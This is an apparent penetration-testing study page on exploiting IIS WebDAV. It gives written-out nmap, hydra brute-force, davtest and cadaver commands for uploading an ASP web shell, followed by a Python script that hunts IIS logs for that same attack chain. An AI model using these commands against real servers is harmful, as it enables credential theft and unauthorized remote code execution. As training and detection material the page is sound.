Frequently exploited Windows Services

Last updated 2 years ago

IIS WebDAV

General information

IIS

  • Default ports: 80, 443
  • Executable file types: .asp, .aspx, .config, .php

WebDAV

WebDAV is a protocol that allows you to edit web content on a server using HTTP or HTTPS connections. It has advantages over FTP such as more security options and file locking.

  • Default ports: 80, 443
  • Needs legitimate credentials, since it authenticates with a username and password

Steps of exploitation

  1. Enumeration: identify whether WebDAV has been configured to run on the IIS web server.

  2. Brute-force the WebDAV authentication to identify legitimate credentials that can be used to log in.

  3. Upload a malicious file (such as an .asp payload) and execute arbitrary commands or obtain a reverse shell on the target.

Useful tools

Exploitation

nmap

nmap -sV -sC $IP
  • nmap deep dive

nmap -sV -p 80 --script=http-enum $IP

Bruteforce the authentication

The address will be http://$IP/webdav/

hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt $IP http-get /webdav/

davtest

davtest -auth admin:password_123 -url http://$IP/webdav
  • The most important part of the output is the execution check: it shows that .asp files are executed, so an .asp web shell can be used to get a reverse shell

cadaver

cadaver http://$IP/webdav

Enter the credentials to get a cadaver command prompt
  • Use the web shells pre-packaged with Kali Linux to upload a file and get access

Folder:

/usr/share/webshells
  • Using the cadaver shell upload the web shell

put /usr/share/webshells/asp/cmd
  • Browse to the uploaded file in the browser to execute the web shell
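As a defensive counterpart to the chain above (an added example, not part of the original page): a Python hunt over IIS W3C log lines that flags the burst of 401s a hydra run leaves behind and the PUT of an executable file through WebDAV. The log lines, the field layout chosen for them and the brute-force threshold are constructed for the example.

```python
"""Hunt IIS W3C logs for the WebDAV abuse chain described above:
a burst of 401s (credential brute force) followed by a PUT of an
executable file into the WebDAV share. Log lines are constructed."""
from collections import Counter

EXEC_EXT = (".asp", ".aspx", ".config", ".php")  # extensions IIS executes (see above)
BRUTE_THRESHOLD = 5  # 401s from one client IP before we call it brute force (assumed)

SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus
2024-03-01 10:00:01 10.0.0.5 GET /webdav/ - 80 - 10.0.0.9 Mozilla/5.0 401 2
2024-03-01 10:00:02 10.0.0.5 GET /webdav/ - 80 - 10.0.0.9 Mozilla/5.0 401 1
2024-03-01 10:00:02 10.0.0.5 GET /webdav/ - 80 - 10.0.0.9 Mozilla/5.0 401 1
2024-03-01 10:00:03 10.0.0.5 GET /webdav/ - 80 - 10.0.0.9 Mozilla/5.0 401 1
2024-03-01 10:00:03 10.0.0.5 GET /webdav/ - 80 - 10.0.0.9 Mozilla/5.0 401 1
2024-03-01 10:00:04 10.0.0.5 GET /webdav/ - 80 admin 10.0.0.9 Mozilla/5.0 200 0
2024-03-01 10:00:09 10.0.0.5 PUT /webdav/cmd.asp - 80 admin 10.0.0.9 cadaver/0.23.3 201 0
2024-03-01 10:02:00 10.0.0.5 PUT /webdav/notes.txt - 80 bob 10.0.0.20 Mozilla/5.0 201 0
2024-03-01 10:03:00 10.0.0.5 GET /webdav/ - 80 - 10.0.0.21 Mozilla/5.0 401 2
"""

def parse_w3c(text):
    """Yield one dict per entry, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):  # skip truncated or malformed entries
                yield dict(zip(fields, parts))

def hunt(text, threshold=BRUTE_THRESHOLD):
    """Return brute-force sources, executable uploads, and the overlap of the two."""
    unauthorized = Counter()
    uploads = []
    for rec in parse_w3c(text):
        if rec["sc-status"] == "401":
            unauthorized[rec["c-ip"]] += 1
        if rec["cs-method"] == "PUT" and rec["cs-uri-stem"].lower().endswith(EXEC_EXT):
            uploads.append((rec["c-ip"], rec["cs-username"], rec["cs-uri-stem"]))
    brute = {ip for ip, n in unauthorized.items() if n >= threshold}
    return {"brute_force_sources": brute,
            "executable_uploads": uploads,
            "uploads_after_brute_force": [u for u in uploads if u[0] in brute]}

if __name__ == "__main__":
    print(hunt(SAMPLE_LOG))
```

A PUT of an executable extension from an IP that just produced a run of 401s is the high-signal combination; a lone PUT from an authenticated user (the notes.txt entry) is only worth a look.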

  • davtest -> Used to scan, authenticate and exploit a WebDAV server.

  • cadaver -> Supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.